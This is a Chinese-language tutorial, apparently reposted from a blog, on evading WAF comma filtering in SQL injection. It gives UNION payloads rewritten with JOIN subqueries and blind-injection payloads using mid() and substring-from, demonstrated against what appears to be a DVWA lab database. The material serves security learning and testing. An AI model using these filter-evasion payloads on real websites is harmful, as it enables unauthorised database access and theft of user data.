SQL注入技巧之显注与盲注中过滤逗号绕过详析
<p><span><strong>前言</strong></span></p>
<p>
sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧</p>
<p>
<span><strong>1.联合查询显注绕过逗号</strong></span></p>
<p>
在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。</p>
<p>
<strong>绕过</strong></p>
<p>
在显示位上替换为常见的注入变量或其它语句</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_88109">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,3;</code>
</div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">((</code><code class="sql keyword">select</code> <code class="sql plain">1)A </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">2)B </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">3)C);</code>
</div>
<div class="line number4 index3 alt1">
</div>
<div class="line number5 index4 alt2">
<code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">((</code><code class="sql keyword">select</code> <code class="sql plain">1)A </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">2)B </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">group_concat(</code><code class="sql color2">user</code><code class="sql plain">(),</code><code class="sql string">' '</code><code class="sql plain">,</code><code class="sql keyword">database</code><code class="sql plain">(),</code><code class="sql string">' '</code><code class="sql plain">,@@datadir))C);</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
在数据库中演示联合查询</p>
<p>
UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_342154">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,3;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| user_id | </code><code class="sql color2">user</code> <code class="sql plain">| </code><code class="sql keyword">password</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 1 | 2 | 3 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">2 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.04 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
不出现逗号,使用Join来注入</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_771821">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">((</code><code class="sql keyword">select</code> <code class="sql plain">1)A </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">2)B </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">3)C);</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| user_id | </code><code class="sql color2">user</code> <code class="sql plain">| </code><code class="sql keyword">password</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 1 | 2 | 3 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">2 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.05 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
查询我们想要的数据</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_594757">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">((</code><code class="sql keyword">select</code> <code class="sql plain">1)A </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">2)B </code><code class="sql color1">join</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">group_concat(</code><code class="sql color2">user</code><code class="sql plain">(),</code><code class="sql string">' '</code><code class="sql plain">,</code><code class="sql keyword">database</code><code class="sql plain">(),</code><code class="sql string">' '</code><code class="sql plain">,@@datadir))C);;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+-------------------------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| user_id | </code><code class="sql color2">user</code> <code class="sql plain">| </code><code class="sql keyword">password</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+-------------------------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">+</code><code class="sql comments">---------+-------+-------------------------------------------------+</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">2 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.08 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>2.盲注中逗号绕过</strong></span></p>
<p>
MID 和substr 函数用于从文本字段中提取字符</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_372319">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">mid(</code><code class="sql color2">user</code><code class="sql plain">(),1,2);</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| mid(</code><code class="sql color2">user</code><code class="sql plain">(),1,2) |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| ro |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.04 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
查询数据库用户名第一个字符的ascii码</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_361268">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">ascii(mid(</code><code class="sql color2">user</code><code class="sql plain">(),1,2)),2,3;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| user_id | </code><code class="sql color2">user</code> <code class="sql plain">| </code><code class="sql keyword">password</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 114 | 2 | 3 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">2 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.05 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
盲注,通过猜ascii值</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_593992">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">where</code> <code class="sql plain">user_id=1 </code><code class="sql color1">and</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">ascii(mid(</code><code class="sql color2">user</code><code class="sql plain">(),1,2))=115) ;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Empty </code><code class="sql keyword">set</code>
</div>
<div class="line number3 index2 alt2">
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">where</code> <code class="sql plain">user_id=1 </code><code class="sql color1">and</code> <code class="sql plain">(</code><code class="sql keyword">select</code> <code class="sql plain">ascii(mid(</code><code class="sql color2">user</code><code class="sql plain">(),1,2))=114) ;</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| user_id | </code><code class="sql color2">user</code> <code class="sql plain">| </code><code class="sql keyword">password</code> <code class="sql plain">|</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.04 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
逗号绕过SUBTTRING 函数</p>
<blockquote>
<p>
substring(str FROM pos)</p>
</blockquote>
<p>
从字符串str的起始位置pos 返回一个子串</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_550225">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql color2">substring</code><code class="sql plain">(</code><code class="sql string">'hello'</code> <code class="sql keyword">from</code> <code class="sql plain">1);</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql color2">substring</code><code class="sql plain">(</code><code class="sql string">'hello'</code> <code class="sql keyword">from</code> <code class="sql plain">1) |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| hello |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.04 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql color2">substring</code><code class="sql plain">(</code><code class="sql string">'hello'</code> <code class="sql keyword">from</code> <code class="sql plain">2);</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">| </code><code class="sql color2">substring</code><code class="sql plain">(</code><code class="sql string">'hello'</code> <code class="sql keyword">from</code> <code class="sql plain">2) |</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">| ello |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.03 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
注入</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_284792">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">where</code> <code class="sql plain">user_id=1 </code><code class="sql color1">and</code> <code class="sql plain">(ascii(</code><code class="sql color2">substring</code><code class="sql plain">(</code><code class="sql color2">user</code><code class="sql plain">() </code><code class="sql keyword">from</code> <code class="sql plain">2))=114) ;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Empty </code><code class="sql keyword">set</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">//</code><code class="sql color2">substring</code><code class="sql plain">(</code><code class="sql color2">user</code><code class="sql plain">() </code><code class="sql keyword">from</code> <code class="sql plain">2)为o</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">//o的ascii为111,</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">user_id,</code><code class="sql color2">user</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">where</code> <code class="sql plain">user_id=1 </code><code class="sql color1">and</code> <code class="sql plain">(ascii(</code><code class="sql color2">substring</code><code class="sql plain">(</code><code class="sql color2">user</code><code class="sql plain">() </code><code class="sql keyword">from</code> <code class="sql plain">2))=111) ;</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| user_id | </code><code class="sql color2">user</code> <code class="sql plain">| </code><code class="sql keyword">password</code> <code class="sql plain">|</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">---------+-------+----------------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.03 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>总结</strong></span></p>
<p>
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对的支持。</p>
<p>
原文链接:http://www.cnblogs.com/hackxf/p/9490534.html</p>
頁:
[1]